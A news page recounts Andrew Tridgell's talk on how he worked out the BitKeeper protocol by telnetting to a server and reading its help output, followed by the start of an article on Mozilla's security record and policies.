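arch = {"layers": [{"units": 12, "activation": "relu"},
                   {"units": 1, "activation": "sigmoid"}]}
w = [[0.1, -0.2], [0.3]]

save_model(arch, w, "model.json", "model.weights")
arch2, w2 = load_model("model.json", "model.weights")
```

The point of the separation is the same as in Keras: the cheap, human-readable structure file can be versioned and inspected, while the bulky numeric weights travel in their own binary-friendly container.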
Traceback (most recent call last):
File "simple_rnn.py", line 158, in
loaded_model = model_from_yaml(loaded_model_yaml)
File "/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/models.py", line 26, in model_from_yaml
return layer_from_config(config, custom_objects=custom_objects)
File "/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/models.py", line 781, in from_config
layer = get_or_create_layer(first_layer)
File "/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/models.py", line 765, in get_or_create_layer
layer = layer_from_config(layer_data)
File "/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/engine/topology.py", line 896, in from_config
return cls(**config)
File "/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/layers/recurrent.py", line 290, in __init__
self.init = initializations.get(init)
File "/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/initializations.py", line 109, in get
'initialization', kwargs=kwargs)
File "/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/utils/generic_utils.py", line 14, in get_from_module
str(identifier))
Exception: Invalid initialization:

What could be the reason? The file is getting saved properly, but at the time of loading the model I am facing this issue. Can you please give me any pointers?
Thanks,
Onkar

Sorry Onkar, the fault is not clear. Are you able to execute the example in the tutorial OK?

Your code worked fine. I tried to add saving the model to my code, but the files were not actually created, although I got no error messages. Please advise.
Walid

I expect the files were created. Check your current working directory / the dir where the source code files are located.

Hi Jason,
Thanks for creating this valuable content. On my Mac (OS X 10.11), the script ran fine until the last line, on which it gave the syntax error below:

>>> print "%s: %.2f%%" % (loaded_model.metrics_names[1], score[1]*100)
File "", line 1
print "%s: %.2f%%" % (loaded_model.metrics_names[1], score[1]*100)
^
SyntaxError: invalid syntax

What could be the issue here?
Thanks,
Peter

Hi Peter, you may be on Python 3; try adding brackets around the argument to the print function.

Hi,
Your blog and books were great, and thanks to you I finally got my project working in Keras. I can't seem to find how to translate a Keras model into standalone code that can run without Keras installed. The best I could find was to learn TensorFlow, build an equivalent model in TF, then use TF to create standalone code. Does Keras not have such functionality? Thanks

Hi, my understanding is that Keras is required to use the model for prediction. You could try to save the network weights and use them in your own code, but you would be creating a lot of work for yourself.

Hello Jason,
Thanks for your great and very helpful website. Since you talked here about how to save a model, I wanted to know how we can save an embedding layer in a way that can be seen as a regular word embeddings file (i.e. a text file or txt format). Let's assume we either learn these word embeddings in the model from scratch, or we update pre-trained ones that are fed into the first layer of the model. I truly appreciate your response in advance.
Regards,
Davood

I'm not sure we need to save embedding layers, Davood. I believe they are deterministic and can just be re-created.

I guess we should be able to save word embeddings at some point (not always needed, though!). To visualize/map them in a (2D) space, or to test algebraic word analogies on them, are some examples of this need. I found the answer for this and I'm sharing it here: if we train an embedding layer emb (e.g. emb = Embedding(some_parameters_here)), we can get the resulting word-by-dimension matrix with my_embeddings = emb.get_weights(). Then we can do normal NumPy things like np.save("my_embeddings.npy", my_embeddings) to save this matrix, or use other built-in write-to-a-file functions in Python to store each line of this matrix along with its associated word.
These words and their indices are typically stored in a word_index dictionary somewhere in the code.

Very nice, thanks for sharing the specifics Davood.

You are very welcome, Jason. However, I have another question here! Let's assume we have two columns of networks in Keras and these two columns are exactly the same. These two are going to merge at the top and then feed into a dense layer, which is the output layer in our model. My question is, while the first layer of each column here is an embedding layer, how can we share the weights of the similar layers in the columns? Needless to say, we set up our embedding layers (first layers) so that we only have one embedding matrix. What I mean is shared embeddings, something like this: emb1 = Embedding(some_parameters_here); emb2 = emb1 (instead of emb2 = Embedding(some_other_parameters_here)). How about the other layers on top of these two embedding layers? How can we share their weights? Thanks for your answer in advance.

Hmm, interesting Davood. I think, and I could be wrong, that embedding layers are deterministic. They do not have state; only the weights in or out have state. Create two and use them side by side. Try it and see. I'd love to know how you go?
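Davood's recipe above, pulling the matrix with get_weights() and writing one "word vector" line per vocabulary entry, can be sketched with toy data and no Keras or NumPy. The vocabulary, vectors and file name below are invented for illustration; with a real model, matrix would be emb.get_weights()[0]:

```python
def write_embeddings(word_index, matrix, path):
    """Write a text file with one 'word v1 v2 ...' line per vocabulary entry."""
    with open(path, "w") as f:
        # Iterate words in index order so line i holds the vector for index i
        for word, idx in sorted(word_index.items(), key=lambda kv: kv[1]):
            vec = " ".join(str(v) for v in matrix[idx])
            f.write("%s %s\n" % (word, vec))

word_index = {"hello": 0, "world": 1}           # toy vocabulary
matrix = [[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]     # toy embedding matrix
write_embeddings(word_index, matrix, "my_embeddings.txt")
```

The resulting file has the same one-word-per-line layout as common pre-trained embedding distributions, so it can be inspected or re-loaded by the usual parsing loops.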
Thank you for creating such a great blog. I saved a model with the mentioned code, but when I wanted to load it again I faced the following error. It seems the network architecture was not saved correctly?

---------------------------------------------------------------------------
Exception                                 Traceback (most recent call last)
in ()
1 # load weights into new model
----> 2 modelN.load_weights("model41.h5")
3 print("Loaded model from disk")

C:\Anaconda2\envs\py35\lib\site-packages\keras\engine\topology.py in load_weights(self, filepath, by_name)
2518     self.load_weights_from_hdf5_group_by_name(f)
2519 else:
-> 2520     self.load_weights_from_hdf5_group(f)
2521
2522 if hasattr(f, 'close'):

C:\Anaconda2\envs\py35\lib\site-packages\keras\engine\topology.py in load_weights_from_hdf5_group(self, f)
2570     'containing ' + str(len(layer_names)) +
2571     ' layers into a model with ' +
-> 2572     str(len(flattened_layers)) + ' layers.')
2573
2574     # We batch weight value assignments in a single backend call

Exception: You are trying to load a weight file containing 4 layers into a model with 5 layers.

Hi Soheil,
It looks like the network structure that you are loading the weights into does not match the structure of the weights. Double check that the network structure matches exactly the structure that you used when you saved the weights. You can even save this structure as a JSON or YAML file as well.

Hi Jason, I have a question. Now that I have saved the model and the weights, is it possible for me to come back after a few days and train the model again with initial weights equal to the ones I saved?

Great question Prajnya. You can load the saved weights and continue training/updating with new data, or start making predictions.

Hi Jason,
It is an amazing blog you have here. Thanks for the well documented work. I have a question regarding loading the model weights. Is there a way to save the weights into a variable rather than loading and assigning the weights to a different model?
I wanted to do some operations on the weights associated with an intermediate hidden layer. I was anticipating using ModelCheckpoint, but I am a bit lost on reading weights from the HDF5 format and saving them to a variable. Could you please help me figure it out? Thanks

Great question, sorry, I have not done this. I expect you will be able to extract them using the Keras API; it might be worth looking at the source code on GitHub.

Hi Jason, thanks a lot for your excellent tutorials! Very much appreciated. Regarding the saving and loading: it seems that Keras as of now saves the model and weights together in HDF5 rather than only the weights. This results in a much simpler snippet for import/export:

from keras.models import load_model

model.save('my_model.h5')  # creates a HDF5 file 'my_model.h5'
del model  # deletes the existing model

# returns a compiled model
# identical to the previous one
model = load_model('my_model.h5')

Thanks Patrick, I'll investigate and look at updating the post soon.

Getting this error: NameError: name 'model_from_json' is not defined. Thanks in advance for any help on this.

Confirm that you have Keras 1.2.2 or higher installed.

I have saved my weights already in a txt file. Can I use it and load the weights?

You may be able to; I don't have an example off-hand, sorry.

Hi Jason,
Thank you for this great tutorial. I want to convert this Keras model (model.h5) to a TensorFlow model (filename.pb) because I want to use it on Android.
I have used the github code that is: ========================================= import keras import tensorflow from keras import backend as K from tensorflow.contrib.session_bundle import exporter from keras.models import model_from_config, Sequential print(“Loading model for exporting to Protocol Buffer format…”) model_path = “C:/Users/User/buildingrecog/model.h5” model = keras.models.load_model(model_path) K.set_learning_phase(0) # all new operations will be in test mode from now on sess = K.get_session() # serialize the model and get its weights, for quick re-building config = model.get_config() weights = model.get_weights() # re-build a model where the learning phase is now hard-coded to 0 new_model = Sequential.model_from_config(config) new_model.set_weights(weights) export_path = “C:/Users/User/buildingrecog/khi_buildings.pb” # where to save the exported graph export_version = 1 # version number (integer) saver = tensorflow.train.Saver(sharded=True) model_exporter = exporter.Exporter(saver) signature = exporter.classification_signature(input_tensor=model.input, scores_tensor=model.output) model_exporter.init(sess.graph.as_graph_def(), default_graph_signature=signature) model_exporter.export(export_path, tensorflow.constant(export_version), sess) ———————————————————————————– but has the following error… ===================== ————————————————————————— ValueError Traceback (most recent call last) in () 7 print(“Loading model for exporting to Protocol Buffer format…”) 8 model_path = “C:/Users/User/buildingrecog/model.h5” —-> 9 model = keras.models.load_model(model_path) 10 11 K.set_learning_phase(0) # all new operations will be in test mode from now on C:\Users\User\Anaconda3\lib\site-packages\keras\models.py in load_model(filepath, custom_objects) 228 model_config = f.attrs.get(‘model_config’) 229 if model_config is None: –> 230 raise ValueError(‘No model found in config file.’) 231 model_config = json.loads(model_config.decode(‘utf-8’)) 232 model = 
model_from_config(model_config, custom_objects=custom_objects) ValueError: No model found in config file. —————————————————————- Please help me to solve this…!! Sorry, I don’t know how to load keras models in tensorflow off-hand. M Amer, I ma trying to do exactly the same thing. Please let us know if you figure it out. Hi Jason, I have created the keras model file (.h5) unfortunately it can’t be loaded. But I want to load it and convert it into tensor flow (.pb) model.Any Solution? Waiting for your response…. Sorry, I don’t have an example of how to load a Keras model in TensorFlow. Hi Jason, I am having issues with loading the model which has been saved with normalising (StandardScaler) the columns. Do you have to apply normalising (StandarScaler) when you load the models too? Here is the snippet of code: 1) Save and 2)Load Save: import numpy as np import matplotlib.pyplot as plt import pandas as pd # Importing the dataset dataset = pd.read_csv(‘Churn]) onehotencoder = OneHotEncoder(categorical_features = [1]) X = onehotencoder.fit_transform(X).toarray() X = X[:, 1:] # Splitting the dataset into the Training set and Test set from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0) # Feature Scaling from sklearn.preprocessing import StandardScaler sc = StandardScaler() X_train = sc.fit_transform(X_train) X_test = sc.transform(X_test) # Importing the Keras libraries and packages import keras from keras.models import Sequential from keras.layers import Dense # Initialising the ANN classifier = Sequential() classifier.add(Dense(units = 6, kernel_initializer = ‘uniform’, activation = ‘relu’, input_dim = 11)) classifier.add(Dense(units = 6, kernel_initializer = ‘uniform’, activation = ‘relu’)) classifier.add(Dense(units = 1, kernel_initializer = ‘uniform’, activation = ‘sigmoid’)) classifier.compile(optimizer = ‘adam’, loss = ‘binary_crossentropy’, metrics = [‘accuracy’]) # Fitting 
the ANN to the Training set classifier.fit(X_train, y_train, batch_size = 10, epochs = 1) # Predicting the Test set results y_pred = classifier.predict(X_test) y_pred = (y_pred > 0.5) # Saving your model classifier.save(“ann_churn_model_v1.h5”) Load: import numpy as np import matplotlib.pyplot as plt import pandas as pd # Reuse churn_model_v1.h5 import keras from keras.models import load_model classifier = load_model(“ann_churn_model_v1.h5”) # Feature Scaling – Here I have a question whether to apply StandarScaler after loading the model? from sklearn.preprocessing import StandardScaler #sc = StandardScaler() new_prediction = classifier.predict(sc.transform(np.array([[0.0, 0.0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]]))) new_prediction = (new_prediction > 0.5) Thanks, Sanj You will also need to save your scaler. Perhaps you can pickle it or just the coefficients (min/max for each feature) needed to scale data. Thanks for the useful information. Is it possible to load this model and weights to any other platform, for example Android or iOS. I believe that model and weights are language independent. Are there any free / open source solutions for this purpose? I don’t see why not. Sorry, I not across the android or ios platforms. Hi Jason, How can I create a model out of face recognition encodings to save using Saver.save() method? What is Saver.save()? Hey Jason, have you tried saving a model, closing the python session, then opening a new python session and then loading a model? Using python 3.5, if I save a trained model in one session and load it in another, my accuracy drops dramatically and the predictions become random (as if the model wasn’t trained). 
This is what I’m trying to do: ”’ embedding_size = 64 hidden_size = 64 input_length = 100 learning_rate = 0.1 patience = 3 num_labels = 6 batch_size= 50 epochs = 100 seq_len = 100′ model = Sequential() model.add(Embedding(vocab_size, embedding_size, input_length=input_length)) model.add(Bidirectional(GRU(hidden_size, return_sequences=True, activation=”tanh”))) model.add(TimeDistributed(Dense(num_labels, activation=’softmax’))) optimizer = Adagrad(lr=learning_rate) model.compile(loss=’categorical_crossentropy’, optimizer=optimizer, metrics=[‘categorical_accuracy’]) callbacks = [EarlyStopping(monitor=’val_loss’, patience=patience, verbose=0)] model.fit(x_train, y_train, batch_size=batch_size, epochs = epochs, callbacks=callbacks, validation_data=[x_dev, y_dev]) model.save(“model.h5″) ”’ Evaluating the model in this point gives me accuracy of ~70. Then I exit python, open a new python session, and try: ”’ model2 = load_mode(‘model_full.h5′) ”’ Evaluating the model in this point gives me accuracy of ~20. Any ideas? I have. I don’t believe it is related to the Python session. Off the cuff, my gut tells me something is different in the saved model. If you save and load in the same session is the result the same as prior to the save? What if you repeat the load+test process a few times? Confirm that you are saving the Embedding as well (I think it may need to be saved). Confirm that you are evaluating it on exactly the same data in the same order and in the same way. Neural nets are stochastic and a deviation could affect the internal state of your RNN and result in different results, perhaps not as dramatic as you are reporting through. I seem to get an error message RuntimeError: Unable to create attribute (Object header message is too large) Github issues states that the error could be due to too large network, which is the case here.. but How should i then save the weights… Keras doesn’t seem to have any alternative methods.. Sorry, I have not seen this error. 
See if you can save the weights with a smaller network on your system to try and narrow down the cause of the fault. Hey guys, I want to know how can i update value of model, like i have better model, version 2 and not need to stop service, with use of version 1 before in Keras. I want to say a module manager model, can update new version model, and not need to break service, or something like this. Thank you. You have a few options. You can replace the weights and continue to use the topology. You can replace the topology and weights. You can also continue learning from the existing set of weights, see this post: Hi Jason, do you know if it’s possible saving the model only and every time it’s accuracy over the validation set has improved (after each epoch)? and is it possible checking the validation in a higher frequency than every epoch? thanks! I would expect so George, the callback is quite configurable: Hi Dr. Jason, I am using keras with Tensorflow back-end. I have saved my model as you mentioned here. But the problem was it takes some longer time than expected to load the weights. I am only using a CPU (not a GPU) since my model is kind of a small model. Can you please let me know how to improve the loading time of the model? Compared to sci-kit learn pickled model’s loading time, this is very high (nearly about 1 minute). That is a long time. Confirm that it is Keras causing the problem. Perhaps it is something else in your code? Perhaps you have a very slow HDD? Perhaps you are running out of RAM for some reason? Hi Jason, how can I save a model after gridsearch ? I keep getting errors: “AttributeError: ‘KerasClassifier’ object has no attribute ‘save'”
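The first error in this thread ("a weight file containing 4 layers into a model with 5 layers") comes from exactly the kind of architecture check the save/load pattern relies on. The idea can be sketched without Keras at all; the file format, function names, and toy "network" below are invented purely for illustration:

```python
import json

def save_model(path, layer_sizes, weights):
    # Persist a toy model as JSON: the architecture (layer sizes)
    # alongside the weight matrices (as nested lists).
    with open(path, "w") as f:
        json.dump({"layers": layer_sizes, "weights": weights}, f)

def load_weights_into(path, layer_sizes):
    # Load weights only if the target architecture matches, mirroring
    # the check behind Keras's "trying to load a weight file containing
    # N layers into a model with M layers" exception.
    with open(path) as f:
        saved = json.load(f)
    if saved["layers"] != layer_sizes:
        raise ValueError(
            "You are trying to load weights for %d layers "
            "into a model with %d layers."
            % (len(saved["layers"]), len(layer_sizes)))
    return saved["weights"]

# A 2-layer "network": one 2x2 weight matrix and one 2x1 matrix.
arch = [2, 1]
weights = [[[0.1, 0.2], [0.3, 0.4]], [[0.5], [0.6]]]
save_model("toy_model.json", arch, weights)

print(load_weights_into("toy_model.json", [2, 1]) == weights)  # True
try:
    load_weights_into("toy_model.json", [2, 2, 1])  # wrong architecture
except ValueError:
    print("mismatch detected")
```

The same principle answers several questions above: whatever you rebuild at load time must match, layer for layer, what was in place at save time.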
http://machinelearningmastery.com/save-load-keras-deep-learning-models/
import "go.chromium.org/luci/common/api/internal/gensupport"

Package gensupport is an internal implementation detail used by code generated by the google-api-go-generator tool. This package may be modified at any time without regard for backwards compatibility. It should not be used directly by API users.

buffer.go doc.go json.go jsonfloat.go media.go params.go resumable.go send.go version.go

func CombineBodyMedia(body io.Reader, bodyContentType string, media io.Reader, mediaContentType string) (io.ReadCloser, string)

CombineBodyMedia combines a json body with media content to create a multipart/related HTTP body. It returns a ReadCloser containing the combined body, and the overall "multipart/related" content type, with random boundary. The caller must call Close on the returned ReadCloser if reads are abandoned before reaching EOF.

DecodeResponse decodes the body of res into target. If there is no body, target is unchanged.

DetermineContentType determines the content type of the supplied reader. If the content type is already known, it can be specified via ctype. Otherwise, the content of media will be sniffed to determine the content type. If media implements googleapi.ContentTyper (deprecated), this will be used instead of sniffing the content. After calling DetectContentType the caller must not perform further reads on media, but rather read from the Reader that is returned.

GoVersion returns the Go runtime version. The returned string has no whitespace.

MarshalJSON returns a JSON encoding of schema containing only selected fields. A field is selected if any of the following is true:

* it has a non-empty value
* its field name is present in forceSendFields and it is not a nil pointer or nil interface
* its field name is present in nullFields.

The JSON key for each selected field is taken from the field's json: struct tag.

ReaderAtToReader adapts a ReaderAt to be used as a Reader.
If ra implements googleapi.ContentTyper, then the returned reader will also implement googleapi.ContentTyper, delegating to ra.

RegisterHook registers a Hook to be called before each HTTP request by a generated API. Hooks are called in the order they are registered. Each hook can return a function; if it is non-nil, it is called after the HTTP request returns. These functions are called in the reverse order. RegisterHook should not be called concurrently with itself or SendRequest.

func SendRequest(ctx context.Context, client *http.Client, req *http.Request) (*http.Response, error)

SendRequest sends a single HTTP request using the given client. If ctx is non-nil, it calls all hooks, then sends the request with req.WithContext, then calls any functions returned by the hooks in reverse order.

SetGetBody sets the GetBody field of req to f. This was once needed to gracefully support Go 1.7 and earlier, which didn't have that field. Deprecated: the code generator no longer uses this as of 2019-02-19. Nothing else should be calling this anyway, but we won't delete this immediately; it will be deleted in as early as 6 months.

func SetOptions(u URLParams, opts ...googleapi.CallOption)

SetOptions sets the URL params and any additional call options.

Backoff is an interface around gax.Backoff's Pause method, allowing tests to provide their own implementation.

Hook is the type of a function that is called once before each HTTP request that is sent by a generated API. It returns a function that is called after the request returns. Hooks are not called if the context is nil.

JSONFloat64 is a float64 that supports proper unmarshaling of special float values in JSON, according to. Although that is a proto-to-JSON spec, it applies to all Google APIs. The jsonpb package () has similar functionality, but only for direct translation from proto messages to JSON.
func (f *JSONFloat64) UnmarshalJSON(data []byte) error

MediaBuffer buffers data from an io.Reader to support uploading media in retryable chunks. It should be created with NewMediaBuffer.

func NewMediaBuffer(media io.Reader, chunkSize int) *MediaBuffer

NewMediaBuffer initializes a MediaBuffer.

func PrepareUpload(media io.Reader, chunkSize int) (r io.Reader, mb *MediaBuffer, singleChunk bool)

PrepareUpload determines whether the data in the supplied reader should be uploaded in a single request, or in sequential chunks. chunkSize is the size of the chunk that media should be split into. If chunkSize is zero, media is returned as the first value, and the other two return values are nil, true. Otherwise, a MediaBuffer is returned, along with a bool indicating whether the contents of media fit in a single chunk. After PrepareUpload has been called, media should no longer be used: the media content should be accessed via one of the return values.

Chunk returns the current buffered chunk, the offset in the underlying media from which the chunk is drawn, and the size of the chunk. Successive calls to Chunk return the same chunk between calls to Next.

func (mb *MediaBuffer) Next()

Next advances to the next chunk, which will be returned by the next call to Chunk. Calls to Next without a corresponding prior call to Chunk will have no effect.

MediaInfo holds information for media uploads. It is intended for use by generated code only.

NewInfoFromMedia should be invoked from the Media method of a call. It returns a MediaInfo populated with chunk size and content type, and a reader or MediaBuffer if needed.

NewInfoFromResumableMedia should be invoked from the ResumableMedia method of a call. It returns a MediaInfo using the given reader, size and media type.

func (mi *MediaInfo) ResumableUpload(locURI string) *ResumableUpload

ResumableUpload returns an appropriately configured ResumableUpload value if the upload is resumable, or nil otherwise.
func (mi *MediaInfo) SetProgressUpdater(pu googleapi.ProgressUpdater)

SetProgressUpdater sets the progress updater for the media info.

func (mi *MediaInfo) UploadRequest(reqHeaders http.Header, body io.Reader) (newBody io.Reader, getBody func() (io.ReadCloser, error), cleanup func())

UploadRequest sets up an HTTP request for media upload. It adds headers as necessary, and returns a replacement for the body and a function for http.Request.GetBody.

UploadType determines the type of upload: a single request, or a resumable series of requests.

type ResumableUpload struct {
    Client *http.Client

    // URI is the resumable resource destination provided by the server after specifying "&uploadType=resumable".
    URI string

    UserAgent string // User-Agent for header of the request

    // Media is the object being uploaded.
    Media *MediaBuffer

    // MediaType defines the media type, e.g. "image/jpeg".
    MediaType string

    // Callback is an optional function that will be periodically called with the cumulative number of bytes uploaded.
    Callback func(int64)
    // contains filtered or unexported fields
}

ResumableUpload is used by the generated APIs to provide resumable uploads. It is not used by developers directly.

func (rx *ResumableUpload) Progress() int64

Progress returns the number of bytes uploaded at this point.

Upload starts the process of a resumable upload with a cancellable context. It retries using the provided back off strategy until cancelled or the strategy indicates to stop retrying. It is called from the auto-generated API code and is not visible to the user. Before sending an HTTP request, Upload calls any registered hook functions, and calls the returned functions after the request returns (see send.go). rx is private to the auto-generated API code. Exactly one of resp or err will be nil. If resp is non-nil, the caller must call resp.Body.Close.

URLParams is a simplified replacement for url.Values that safely builds up URL parameters for encoding.
Encode encodes the values into "URL encoded" form ("bar=baz&foo=quux") sorted by key.

Get returns the first value for the given key, or "".

Set sets the key to value. It replaces any existing values.

SetMulti sets the key to an array of values. It replaces any existing values. Note that values must not be modified after calling SetMulti, so the caller is responsible for making a copy if necessary.

Package gensupport imports 21 packages and is imported by 5 packages. Updated 2020-07-02.
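The MediaBuffer contract described above (Chunk keeps returning the same chunk until Next advances, so a failed upload of one chunk can be retried) is easiest to see in a small sketch. This is a Python illustration of the idea only, not the Go API; the class and variable names are invented:

```python
import io

class MediaBufferSketch:
    # A loose Python analogue of gensupport's MediaBuffer: it buffers a
    # reader so each chunk can be re-read (and hence retried) until the
    # caller explicitly advances with next().
    def __init__(self, media, chunk_size):
        self.media = media
        self.chunk_size = chunk_size
        self.off = 0
        self.buf = media.read(chunk_size)

    def chunk(self):
        # Successive calls return the same chunk until next() is called.
        return self.buf, self.off, len(self.buf)

    def next(self):
        self.off += len(self.buf)
        self.buf = self.media.read(self.chunk_size)

mb = MediaBufferSketch(io.BytesIO(b"abcdefghij"), 4)
chunks = []
while True:
    data, off, size = mb.chunk()
    if size == 0:
        break
    chunks.append((off, data))  # in a real client: upload, retrying on failure
    mb.next()

print(chunks)  # [(0, b'abcd'), (4, b'efgh'), (8, b'ij')]
```

The "same chunk until Next" rule is the key design choice: retries never need to seek the underlying reader, which may not be seekable at all.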
https://godoc.org/go.chromium.org/luci/common/api/internal/gensupport
BioSQL

Revision as of 20:37, 14 December 2007.

NOTE - At the time of writing, there are a few problems with BioSQL and Biopython 1.44 which are being fixed in CVS.

You will also need perl (to run BioSQL's schema and taxonomy scripts) and cvs (to get some BioSQL files). Again, on a Debian or Ubuntu Linux machine try this:

sudo apt-get install perl cvs

You may find perl is already installed. For Windows users, see BioSQL/Windows.

Downloading the BioSQL Schema & Scripts

Once the software is installed, your next task is to set up a database and import the BioSQL schema (i.e. set up the relevant tables within the database). If you have CVS installed, then on Linux you can download the latest schema like this (the password is 'cvs'):

cd ~
mkdir repository
cd repository
cvs -d :pserver:cvs@code.open-bio.org:/home/repository/biopython checkout biosql
cvs -d :pserver:cvs@code.open-bio.org:/home/repository/biosql checkout biosql-schema
cd biosql-schema/sql

If you don't want to use CVS, then download the files via the View CVS web interface. Click the Download tarball link to get a tar.gz file containing all the current CVS files, and then unzip that. Or, navigate to the relevant schema file for your database and download just that, e.g. biosql-schema/sql/biosqldb-mysql.sql for MySQL. You will also want the NCBI Taxonomy loading perl script, scripts/load_ncbi_taxonomy.pl.

Creating the empty database

Assuming you are using MySQL, load the schema file (file ~/repository/biosql-schema/sql/biosqldb-mysql.sql if you downloaded the files where we suggested):

cd ~/repository/biosql-schema/sql

NCBI Taxonomy

Before you start trying to load sequences into the database, it is a good idea to load the NCBI taxonomy database using the scripts/load_ncbi_taxonomy.pl script in the BioSQL package. The script should be able to download the files it needs from the NCBI taxonomy FTP site automatically:

cd ~/repository/biosql-schema/scripts
./load_ncbi_taxonomy.pl --dbname bioseqdb --driver mysql --dbuser root --download true
Running the unit tests

Because there are so many ways you could have set up your BioSQL database, you may have to tell the unit test a few bits of information. If you have followed these instructions, then the unit test should just work (using the code in CVS, which will become the next release after Biopython 1.44). If you have done things differently (e.g. PostgreSQL instead of MySQL, or using a different database username and password), then you need to edit the script Tests/setup_BioSQL.py and fill in your connection details.

Creating a (sub) database

BioSQL lets us define named "sub" databases within the single SQL database. For example:

from BioSQL import BioSeqDatabase
server = BioSeqDatabase.open_database(driver="MySQLdb", user="root", passwd = "", host = "localhost", db="bioseqdb")
db = server.new_database("orchids", description="Just for testing")
server.adaptor.commit()

The call server.adaptor.commit() commits the change to the database. You can check this at the command line:

mysql --user=root bioseqdb -e "select * from biodatabase;"

Which should give something like this (assuming you haven't done any other testing yet):

+----------------+---------+-----------+------------------+
| biodatabase_id | name    | authority | description      |
+----------------+---------+-----------+------------------+
|              1 | orchids | NULL      | Just for testing |
+----------------+---------+-----------+------------------+

Now that we have set up an orchids database, let's add some records to it. We can fetch records from GenBank:

from Bio import GenBank
from Bio import SeqIO
handle = GenBank.download_many(['6273291', '6273290', '6273289'])

Now, instead of printing things on screen, let's add these three records to a new (empty) orchid database:

from Bio import GenBank
from Bio import SeqIO
from BioSQL import BioSeqDatabase
server = BioSeqDatabase.open_database(driver="MySQLdb", user="root", passwd = "", host = "localhost", db="bioseqdb")
db = server["orchids"]
handle = GenBank.download_many(['6273291', '6273290', '6273289'])
db.load(SeqIO.parse(handle, "genbank"))
server.adaptor.commit()

Again, you must explicitly call server.adaptor.commit(). To fetch these records back from the database:

from BioSQL import BioSeqDatabase
server = BioSeqDatabase.open_database(driver="MySQLdb", user="root", passwd = "", host = "localhost", db="bioseqdb")
db = server["orchids"]
for identifiers in ['6273291', '6273290', '6273289']:
    seq_record = db.lookup(gi=identifiers)

Todo
- sort out the annotation, e.g. bug 2396.

Deleting a (sub) database

As mentioned above, BioSQL lets us define named "sub" databases. Removing one again requires a final server.adaptor.commit():

from BioSQL import BioSeqDatabase
server = BioSeqDatabase.open_database(driver="MySQLdb", user="root", passwd = "", host = "localhost", db="bioseqdb")
server.remove_database("orchids")
server.adaptor.commit()

Again, you must explicitly finalise the SQL transaction with server.adaptor.commit() to make the deletion permanent!
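To see what the "select * from biodatabase" query above is actually showing, here is a self-contained sketch that mimics the biodatabase table with Python's stdlib sqlite3 in place of MySQL. BioSQL itself is not involved; only the column layout follows the output shown above:

```python
import sqlite3

# In-memory stand-in for the bioseqdb database used on this page.
conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE biodatabase (
        biodatabase_id INTEGER PRIMARY KEY,
        name TEXT,
        authority TEXT,
        description TEXT
    )
""")

# Creating the "orchids" sub-database adds a single row to this table;
# each sequence loaded later just references that row's id.
conn.execute(
    "INSERT INTO biodatabase (name, authority, description) VALUES (?, ?, ?)",
    ("orchids", None, "Just for testing"))
conn.commit()  # like server.adaptor.commit(), nothing is final until here

rows = conn.execute("SELECT * FROM biodatabase").fetchall()
print(rows)  # [(1, 'orchids', None, 'Just for testing')]
```

This is why "deleting a (sub) database" is cheap: a namespace is one row (plus its referencing sequences), not a separate SQL database.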
http://biopython.org/w/index.php?title=BioSQL&diff=2009&oldid=1993
Parent Directory | Revision Log

finley (WIP):
-moved all of finley into its namespace
-introduced some shared pointers
-Mesh is now a class
-other bits and pieces...

Finley changes that were held back while in release mode - moved more stuff into finley namespace.

finley ElementFile is now a class...).

some finley memory

Initial all c++ build. But ... there are now reinterpret_cast<>'s

Some simple experiments for c++ Finley

Round 1 of copyright fixes

First pass of updating copyright notices

Assorted spelling fixes in finley C.

Fixed declaration order (register const) for gcc-4.6

compiler fixes

missing file

This form allows you to request diffs between any two revisions of this file. For each of the two "sides" of the diff, enter a numeric revision.
https://svn.geocomp.uq.edu.au/escript/trunk/finley/src/Mesh_addPoints.cpp?view=log&pathrev=4498
At the end, however, Tridge touched on his role in the separation of the kernel project and BitKeeper. He couldn't talk about much, and he did not announce the release of his BitKeeper client. But he noted that there has been quite a bit of confusion and misinformation regarding what he actually did. It was not, he says, an act of wizardly reverse engineering. Getting a handle on the BitKeeper network protocol turned out to be rather easier than that.

He started by noting that a BitKeeper repository has an identifier like bk://thunk.org:5000/. So, he asked, what happens if you connect to the BitKeeper server port using telnet? A quick demonstration sufficed:

    telnet thunk.org 5000
    Trying 69.25.196.29...
    Connected to thunk.org.
    Escape character is '^]'.

Once connected, why not type a command at it?

    ?       - print this help
    abort   - abort resolve
    check   - check repository
    clone   - clone the current repository
    help    - print this help
    httpget - http get command
    [...]

Tridge noted that this sort of output made the "reverse engineering" process rather easier. What, he wondered, was the help command there for? Did the BitKeeper client occasionally get confused and have to ask for guidance? Anyway, given that output, Tridge concluded that perhaps the clone command could be utilized to obtain a clone of a repository. Sure enough, it returned a large volume of output. Even better, that output was a simple series of SCCS files. At that point, the "reverse engineering" task is essentially complete. There was not a whole lot to it. Now we know about the work which brought about an end to the BitKeeper era.

April 20, 2005

This article was contributed by Joe 'Zonker' Brockmeier.

This reputation has been a bit tattered in recent weeks, though perhaps unfairly. The Mozilla project has released three security updates since February, which has prompted some to call into question the respective security of Firefox in particular, and open source products in general.
Is this proof that Firefox or the Mozilla Suite suffer from as many serious security vulnerabilities as Internet Explorer? Maybe, but the evidence that's in so far suggests otherwise. We spoke to Chris Hofmann, Mozilla's director of engineering, about the recent security fixes and the Mozilla Foundation's security policies. Hofmann said that Mozilla has built "a larger security community" since the Firefox 1.0 release, with "some experts working with us to examine the code and identify potential problems." He also acknowledged that there will be vulnerabilities, but the project is committed to providing a secure browser and repairing problems as quickly as possible.

